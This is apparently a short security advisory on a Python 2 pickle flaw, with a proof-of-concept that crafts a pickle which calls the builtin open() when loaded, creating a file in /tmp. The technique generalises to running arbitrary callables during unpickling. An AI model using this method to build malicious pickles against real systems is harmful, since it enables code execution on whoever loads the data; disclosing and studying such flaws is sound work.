Python Pickle Class Constructor Arbitrary Code Execution Vulnerability

Python Pickle Class Constructor Arbitrary Code Execution Vulnerability

A proof of concept exploit has been provided by Jeff Epler <jepler@unpythonic.net>:

import pickle, new

def nasty(module, function, *args):
return pickle.dumps(new.classobj(function, (), {
'__getinitargs__': lambda self, arg = args: arg,
'__module__': module
}) ())

# Create the evil pickle
t = nasty("__builtin__", "open", "/tmp/pickle-bug", "w")
# Show the user how it looks
print repr(t)
# Now, load the pickle -- creates the file /tmp/python-is-buggy (by calling
# the builtin open() function, then raises an exception. But the damage is
# done...
pickle.loads(t)